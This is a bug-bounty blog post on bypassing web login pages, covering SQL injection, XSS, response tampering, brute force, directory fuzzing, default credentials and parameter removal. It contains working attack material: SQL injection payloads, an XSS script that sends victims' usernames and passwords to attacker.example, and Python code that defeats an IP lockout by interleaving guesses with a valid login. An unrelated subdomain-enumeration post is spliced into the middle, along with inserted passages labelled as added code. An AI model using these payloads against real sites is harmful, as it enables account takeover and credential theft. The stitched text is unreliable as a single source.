Monday, March 17, 2025

Common Ways Hackers Bypass Web login - mistakes to avoid Hosted Web Services

 Seven Common Ways To Bypass Login Page


Hello to all beginner bug-hunting fellows. This is Uttam Gupta, and today I have come with another blog on login pages. This blog is about bypassing the login functionality of a site through the site's own weaknesses. There are many ways to bypass a login page, but in this blog we discuss some common ones. So let's start.....

We are talking about these seven ways:

  1. Bypass by SQL Injection
  2. By Cross Site Scripting(XSS)
  3. By Manipulating the Response
  4. Bypass by Brute Force Attack
  5. Bypass by Directory Fuzzing Attack
  6. Bypass by Default credentials
  7. By Removing Parameter in Request

Bypass by SQL Injection

I am taking Mutillidae as the example for the demonstration.

Entering a single quote (') in the username field produces a SQL syntax error in the response, which tells us the input reaches the database query unescaped. For this syntax error the payload is ' or 1=1-- (with a space after the two dashes, which MySQL requires for the comment to be recognised). Now let's see what happens when we enter it.

Boooom!! We are logged in as admin: 1=1 is always true and the comment sequence removes the password check, so the query returns the first row of the users table, which is usually the admin account. If a payload does not work in your case, try other variants (for example admin'-- to pick a specific account instead of relying on row order), and use sqlmap to dump the usernames and passwords once the injection is confirmed.
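To make concrete why ' or 1=1-- works, here is an added example (my own code, not code from the original post or from Mutillidae) that uses an in-memory SQLite table as a stand-in for the accounts table. The table contents, the column names and the login_vulnerable / login_safe functions are all assumptions made for the demo.

```python
import sqlite3

# Constructed sample data: a stand-in for Mutillidae's accounts table.
# (Assumption: the admin row comes first, as it usually does in such demos.)
SAMPLE_ACCOUNTS = [("admin", "adminpass"), ("john", "monkey")]


def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO accounts VALUES (?, ?)", SAMPLE_ACCOUNTS)
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """The mistake: user input is pasted straight into the SQL text.
    Returns the username the query matched, or None."""
    query = ("SELECT username FROM accounts WHERE username = '"
             + username + "' AND password = '" + password + "'")
    row = conn.execute(query).fetchone()    # first matching row wins
    return row[0] if row else None


def login_safe(conn, username, password):
    """The fix: a parameterised query binds the input as data, so a quote
    or a comment sequence in the input is never parsed as SQL."""
    row = conn.execute(
        "SELECT username FROM accounts WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = build_db()
    # ' or 1=1--  turns the WHERE clause into  username = '' or 1=1  and
    # comments out the password check, so the first row (admin) comes back.
    print(login_vulnerable(db, "' or 1=1-- ", "anything"))   # admin
    # admin'--  targets one account instead of relying on row order.
    print(login_vulnerable(db, "admin'-- ", "anything"))     # admin
    print(login_safe(db, "' or 1=1-- ", "anything"))         # None
```

SQLite accepts the same -- comment syntax as MySQL, which is why the payload carries over; in MySQL the trailing space after the dashes is mandatory, and # works as an alternative comment marker. sqlmap automates exactly this kind of probing and can dump the table once the injection is confirmed.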

By Cross Site Scripting(XSS)

Enter the XSS payload <script>alert(1)</script>; if the popup appears, the login page reflects input without escaping it. You can then use the same injection point to plant a script that captures what a victim types into the login form and sends it to a server you control (the blog calls this CSRF via XSS, but strictly it is credential harvesting through XSS). This is the payload for it:

<script>
// Hook the first form on the page (the login form) and copy what the
// victim typed before the form is submitted.
function intercept() {
  var user = document.forms[0].elements[0].value;
  var pass = document.forms[0].elements[1].value;

  // Send the captured values to a host the attacker controls (replace
  // attacker.example with your own listener). URL-encode them so that
  // characters such as & or # in a password do not break the query string.
  var xhr = new XMLHttpRequest();
  xhr.open("GET", "https://attacker.example/collect?username=" +
           encodeURIComponent(user) + "&password=" + encodeURIComponent(pass));
  xhr.send();
  return false;   // cancels the real submit, so the victim sees the login fail
}
document.forms[0].onsubmit = intercept;
</script>

Read this blog to learn about this method in detail.

By Manipulating the Response

This method is based on manipulating the response status code and the response body. First create an account on the target, log in with the correct credentials while intercepting in Burp Suite, and note what the successful response looks like. Then log in with wrong credentials, intercept the response to that request (Burp's "Do intercept > Response to this request"), and edit it to match the successful one, like this:

Response to the wrong credentials:

403 Forbidden
<redacted>
{"error":true, "message":"Invalid Token"}

Edited to look like the response to the correct credentials:

200 OK
<redacted>
{"success":true}

If the application decides on the client side whether you are logged in, this weakness exists and the site shows you the logged-in page. Check what the server actually gave you, though: if no valid session cookie or token was issued, the "logged-in" view is only cosmetic and requests to protected endpoints will still fail. The real finding is when the server accepts that state or when protected pages never check it.

Bypass by Brute Force Attack

This attack works when the site sets no rate limit or attempt limit, that is, no delay or lockout on the login page. When you repeatedly enter wrong credentials and the site responds with something like "try again after 5 minutes", this method becomes hard. I have written a blog about brute-force attacks; its two parts are included below so you can see how to do the attack.

------

#1 How to perform Login Brute Force using Burp Suite.

First of all, intercept the login request in Burp Suite. Then send the request to Intruder (Ctrl + I).

Clear all the positions. Now add the username and password positions one by one, and select the attack type "Cluster bomb", which tries every username against every password.

For Payload set 1, payload type "Simple list": paste the usernames list.

For Payload set 2, payload type "Simple list": paste the passwords list.

Finally, start the attack and sort the results by status code or length. The valid pair is the request whose response differs from all the others, for example a 302 redirect instead of a 200 with the error message, or a noticeably different length. If you find one, you have hit the target.

----

#2 Broken brute-force protection, IP block.

In this case, after too many failed login attempts our IP gets blocked.

To test this type of login mechanism, first create an account on the target site so that you hold one set of correct credentials (say admin:12345).

The broken part of this brute-force protection is that a successful login resets the failure counter. So, for example, I log in with admin:admin twice, and the third time I log in with admin:12345. Now I can try admin:admin another two times without getting blocked.

Select the Pitchfork attack type, which walks both payload lists in step (row 1 with row 1, row 2 with row 2). Next, select the two parameters we want to attack, the username and the password.

Now create two lists, one for usernames and one for passwords, arranged so that the pairs alternate between your own valid username:password and the target username with a guessed password, keeping the number of consecutive guesses below the block threshold.

For Payload set 1, payload type "Simple list": paste the usernames list.

For Payload set 2, payload type "Simple list": paste the passwords list.

Start the attack and look for a guessed pair whose status code matches the one your own credentials produced. That pair is the bypass.
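Here is an added example (my own code, not from the post or from the lab it refers to) that models the broken IP-block logic described above in Python and runs both the naive attack and the interleaved one against it. The LockoutLogin class, its limit of three failures, the account names wiener:peter and admin, and the candidate password list are assumptions made for the demo; confirm the real target resets its counter the same way before relying on this.

```python
class LockoutLogin:
    """Constructed model of the broken protection: an IP is blocked after
    LIMIT consecutive failures, but any successful login resets the counter.
    (Assumption: the real target behaves like this; verify it first.)"""
    LIMIT = 3

    def __init__(self, users):
        self.users = users        # {username: password}, sample data
        self.failures = {}        # ip -> consecutive failed attempts
        self.blocked = set()

    def login(self, ip, username, password):
        if ip in self.blocked:
            return "blocked"
        if self.users.get(username) == password:
            self.failures[ip] = 0     # the bug: success wipes the counter
            return "ok"
        self.failures[ip] = self.failures.get(ip, 0) + 1
        if self.failures[ip] >= self.LIMIT:
            self.blocked.add(ip)
        return "fail"


def interleaved_lists(target_user, guesses, own_user, own_pass, limit):
    """Build the two Intruder (pitchfork) lists: after every limit-1 guesses
    insert one login with credentials we own, so the counter never reaches
    the block threshold."""
    usernames, passwords = [], []
    for i, guess in enumerate(guesses):
        if i and i % (limit - 1) == 0:
            usernames.append(own_user)
            passwords.append(own_pass)
        usernames.append(target_user)
        passwords.append(guess)
    return usernames, passwords


def brute_force(site, ip, target_user, guesses, own_user=None, own_pass=None):
    """Try each (username, password) pair in order. With own_user/own_pass
    set, the guesses are interleaved with our own valid login; without them
    this is the naive attack that gets blocked. Returns the password found,
    or None."""
    if own_user is None:
        usernames, passwords = [target_user] * len(guesses), list(guesses)
    else:
        usernames, passwords = interleaved_lists(
            target_user, guesses, own_user, own_pass, site.LIMIT)
    for user, pw in zip(usernames, passwords):
        result = site.login(ip, user, pw)
        if result == "blocked":
            return None                  # the rest of the list is wasted
        if result == "ok" and (user, pw) != (own_user, own_pass):
            return pw
    return None


# Constructed sample: we own wiener:peter, the target account is admin.
SAMPLE_USERS = {"admin": "monkey", "wiener": "peter"}
GUESSES = ["123456", "password", "letmein", "qwerty", "monkey"]

if __name__ == "__main__":
    naive = brute_force(LockoutLogin(SAMPLE_USERS), "10.0.0.1", "admin", GUESSES)
    print("naive:", naive)           # None: blocked after three failures
    smart = brute_force(LockoutLogin(SAMPLE_USERS), "10.0.0.1", "admin", GUESSES,
                        own_user="wiener", own_pass="peter")
    print("interleaved:", smart)     # monkey
```

The two lists that interleaved_lists produces are exactly what you paste into Intruder's two payload sets in Pitchfork mode. Note that the reset login must use the real password of your own account; if the target's counter is per account rather than per IP, this trick does not apply and you need another weakness (for example a trusted X-Forwarded-For header) to rotate the blocked identity.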

----

Bypass by Directory Fuzzing Attack

In this method we brute-force directories with tools such as ffuf, DirBuster and Burp Suite Intruder. Most of these tools ship with their own wordlists; if yours does not, Kali Linux keeps wordlists under /usr/share/wordlists (and the SecLists package under /usr/share/seclists), and on Windows you can download the same lists from GitHub.

The tool may find a directory or subdirectory that returns a useful response, or open a page that is supposed to be reachable only after logging in (an admin panel that never checks the session is the classic case). I have used the ffuf tool in this blog; you can see below how it works.

----


#8 Subdomain Enumeration —How to find Subdomains of any Domain

Hello, I have come today with a very useful topic of recon. In this blog we will see how to find the subdomains of any target. So, let's start.

What is Subdomain?

A subdomain is, as the name suggests, an additional section of your main domain name. Subdomains are created to organise and navigate to different parts of a site (for example mail.example.com or dev.example.com), and a domain can have as many of them as needed.

What is Subdomain Enumeration?

It is one of the most crucial parts of the reconnaissance phase while performing a security assessment. Subdomain Enumeration is a process of finding sub-domains of one or more root domains.

Why do we need Subdomain Enumeration?

Subdomain Enumeration helps to create a scope of security assessment by revealing Domains/Subdomains of a target organization. It increases the chance of finding vulnerabilities. And it helps us in finding the web applications that might be forgotten/left unattended by the organization for the maintenance or other reasons and may lead to the disclosure of critical vulnerabilities.

Methods of Subdomain Enumeration

By search engines

Search engines like Google support various advanced search operators to refine search queries; these are often referred to as Google dorks. We can use the site: operator to list all the subdomains Google has indexed for a domain. Let's take the example "site:vulnweb.com".

By online sites

These are some online sites which find the subdomains of any domain.

  1. https://scantrics.io/subdomain-scanner/
  2. https://site-analyzer.pro/services-seo/site-all-subdomains/
  3. https://wikihak.com/Subdomains/Subdomains-scanner.php
  4. https://subdomainfinder.c99.nl/

Lets take an example

Enter your target domain and click on show Subdomain.

By Subfinder(in Kali machine)

Subfinder is a Subdomain discovery tool that discovers valid Subdomains for websites by using passive online sources. It has a simple modular architecture and is optimized for speed.

Installation of Subfinder: open a Kali terminal and run

sudo apt install subfinder

(or, on any system with Go installed, go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest). Cloning the repository alone does not install it. Once it is installed, open a new terminal and type this command

subfinder -d "your target domain"

I am taking “example.com”.

By Sublist3r(in Kali machine)

Sublist3r is a tool written in Python that uses OSINT sources to enumerate the subdomains of websites. It helps pen-testers collect the subdomains of their target domain.

For installation of Sublist3r checkout this link https://www.geeksforgeeks.org/what-is-sublist3r-and-how-to-use-it/

Once it is installed, open a new terminal and type this command

sublist3r -d "your target domain"

I am taking “vulnweb.com”.

By Amass(in Kali machine)

This package contains a tool to help information security professionals perform network mapping of attack surfaces and perform external asset discovery using open source information gathering and active reconnaissance techniques.

Installation of Amass: open a Kali terminal and run these commands

sudo apt-get update
sudo apt-get install amass

Once it is installed, run the subdomain enumeration command.

amass enum -d "your target domain"

I am again taking “vulnweb.com”.

Brute Force Subdomain By ffuf(in Kali machine)

ffuf is a fast web fuzzer written in Go that does directory discovery, virtual host discovery (without DNS records) and GET and POST parameter fuzzing.

Installation of ffuf: open a Kali terminal and run

sudo apt install ffuf

(or, with Go installed, go install github.com/ffuf/ffuf/v2@latest). In this method we are brute-forcing, so we also need a subdomain wordlist; SecLists has several under Discovery/DNS, and others are easy to find on Google. Save it in your wordlists folder. Now see an example on "vulnweb.com".

Command,

ffuf -w /path/to/wordlist -u https://FUZZ.target

-w is the wordlist, -u the target URL, and FUZZ marks the part to brute-force. Note that this form only finds subdomains that resolve in DNS; for virtual hosts without DNS records, keep the URL fixed and fuzz the Host header instead (ffuf's -H "Host: FUZZ.target" option). Also watch for a wildcard DNS record, which makes every name resolve and floods the output with identical responses; filter those by size or status.
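Both the directory fuzzing section above and this ffuf run are the same loop: substitute each word into a URL template, request it, and keep only the responses that differ from the "not found" baseline. Here is an added example (my own code, not from the post or from ffuf) of that loop in Python, including the soft-404 / wildcard filtering that a naive fuzzer gets wrong. The fake site, its paths and sizes, the wordlist and the fetch callback are constructed for an offline run and are assumptions for the demo.

```python
import random
import string


def fuzz(fetch, template, wordlist, keep=(200, 204, 301, 302, 307, 401, 403)):
    """ffuf-style fuzzing with a soft-404 baseline.

    fetch(url) -> (status_code, body_length). template contains the literal
    word FUZZ where each wordlist entry is substituted, for example
    https://target.example/FUZZ or https://FUZZ.target.example/.
    Before the real run, a random word that cannot exist is requested; any
    later hit whose status and length equal that baseline is dropped, the
    same idea as ffuf's -ac auto-calibration or a manual -fs filter."""
    junk = "".join(random.choices(string.ascii_lowercase, k=16))
    baseline = fetch(template.replace("FUZZ", junk))
    hits = []
    for word in wordlist:
        status, size = fetch(template.replace("FUZZ", word))
        if status not in keep:
            continue
        if (status, size) == baseline:
            continue        # identical to the catch-all page: not a real hit
        hits.append((word, status, size))
    return hits


# Constructed fake site for an offline run. It answers 200 with a 1337-byte
# "page not found" body for every unknown path (a soft 404), which would
# make a fuzzer that only looks at the status code report every word.
FAKE_SITE = {
    "/admin/": (200, 5120),       # admin panel that never checks the session
    "/backup.zip": (200, 200000),
    "/dashboard": (302, 0),       # redirects to the login page
    "/robots.txt": (200, 48),
}
SOFT_404 = (200, 1337)


def fake_fetch(url):
    path = url[len("https://target.example"):]
    return FAKE_SITE.get(path, SOFT_404)


WORDLIST = ["admin/", "backup.zip", "dashboard", "images", "robots.txt", "uploads"]

if __name__ == "__main__":
    for word, status, size in fuzz(fake_fetch, "https://target.example/FUZZ", WORDLIST):
        print(f"{status} {size:>7}  /{word}")
```

Against a real target, fetch would wrap an HTTP client call with redirects disabled and return the status code and body length; with the https://FUZZ.target.example/ template, a wildcard DNS record plays the role of the soft 404 and the same baseline check removes it. Hits with status 401 or 403 are still worth listing: they confirm that a path exists even though it is protected.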

Those are some methods to find subdomains; I hope you have learned something new. That's all for today. Thank you for reading. Be an ethical hacker and stay safe.

----

Bypass by Default credentials

When developers build a site they often create default or test credentials, and many times these are never removed from the user database. Also, when the site accepts any password, many users choose weak ones and the site happily stores them. So always try default credentials; lists of them are easy to find on Google. Examples: admin:admin, admin:password, username:pass12345, and the documented defaults of whatever product or framework the site runs.

By Removing Parameter in Request

When you enter wrong credentials the site shows errors such as "username and password are incorrect / do not match" or "password is incorrect for this username". When you see this kind of response you can try this method. First intercept the request, remove the password parameter entirely (the whole name=value pair, not just its value) and forward the request. If the server only checks the password when one is present, it sees that the username exists and logs you in. This happens when the server does not validate the request properly; try the same with any other parameter the login depends on, such as an OTP or captcha field.
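As an added example (my own code, not from the post), here is what the server-side mistake looks like in Python, next to the corrected handler and a small probe that replays a request with each parameter removed in turn. The USERS store, the form dictionary and the function names are assumptions for the demo.

```python
import hmac

# Constructed sample account store.
USERS = {"admin": "S3cret!"}
DUMMY = "x" * 16   # compared against when the user does not exist, to keep timing even


def login_vulnerable(form):
    """The mistake: the password is only checked if the client sent one.
    Delete the password parameter and the check is skipped entirely."""
    username = form.get("username")
    if username not in USERS:
        return False
    password = form.get("password")
    if password is not None and not hmac.compare_digest(
            password.encode(), USERS[username].encode()):
        return False
    return True


def login_fixed(form):
    """The fix: every required parameter must be present and must verify,
    whether or not the user exists."""
    username = form.get("username")
    password = form.get("password")
    if username is None or password is None:
        return False
    expected = USERS.get(username)
    ok = hmac.compare_digest(
        password.encode(), (expected if expected is not None else DUMMY).encode())
    return expected is not None and ok


def probe_parameter_removal(login, form):
    """Tester's check: replay the same request once per parameter with that
    parameter removed, and report which removals result in a login."""
    return [key for key in form
            if login({k: v for k, v in form.items() if k != key})]


if __name__ == "__main__":
    request = {"username": "admin", "password": "wrong"}
    print(probe_parameter_removal(login_vulnerable, request))   # ['password']
    print(probe_parameter_removal(login_fixed, request))        # []
```

The probe is the same thing you do by hand in Burp Repeater: the request with the wrong password must fail, and deleting a parameter must not turn that failure into a success. Also try an empty value (password=) separately, since some handlers treat "missing" and "empty" differently.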

These are some of the ways; I hope you enjoyed it and learned something new from this blog. That's it for today's blog, see you in the next one. Thank you for reading.

Be An Ethical Hacker.


Bug Bounty
Cybersecurity
Ethical Hacking


















